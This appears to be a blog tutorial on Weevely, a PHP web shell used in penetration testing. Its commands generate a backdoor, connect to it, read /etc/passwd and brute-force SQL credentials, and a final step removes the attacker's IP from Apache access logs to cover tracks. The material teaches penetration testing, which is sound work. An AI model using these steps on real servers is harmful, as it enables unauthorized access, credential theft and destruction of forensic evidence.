Weevely tutorial: from basic to advance PHP web shell

by do son · Published April 26, 2017 · Updated November 5, 2017

Weevely is a webshell management tool written in python. Weevely tutorial article describes from basic to advance its most function on your penetration testing. Weevely is available on Kali Linux.

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation, and network lateral movement, even in the restricted environment.

Feature

Ssh-like terminal
SQL console pivoted on target
HTTP proxy pivoted on target
Host configuration security auditing
Mount of the remote filesystem
Network scan pivoted on target
File upload and download
Reverse and direct TCP shell
Meterpreter support
Service account bruteforce
Compressed archive management

Let’s start WEEVELY TUTORIAL

Installation

root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade

root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Usage

Generate a backdoor

root@ddos:~# weevely generate ddos ddos.php
Generated backdoor with password ‘ddos’ in ‘ddos.php’ of 1439 byte size.

root@ddos:/usr/share/weevely# ls
bd core ddos.php modules utils weevely.py

You need to use some technique for uploading webshell like double extension, bypass image type validation, bypass whitelist/blacklist. View here.

Connect to the backdoor

root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos

Bypass Policy to Read /etc/passwd

www-data@ddos:/etc $ audit_etcpasswd

Guess the SQL user credentials

This tip teaches you how to guess the credentials of multiple SQL users.

weevely> bruteforce_sql –help

Log cleanup

This skill to teach you how to clear the server in the tracking records.

We use the system_info command to find our own ip

www-data@ddos:/var/log $ system_info -info client_ip

We use the grep command to confirm that our ip records in the log file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”

we can see that the activities of our IP address have been recorded, we can again use grep to remove our log from the ip, and then save it to a temporary file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Let’s test to see if we’ve deleted it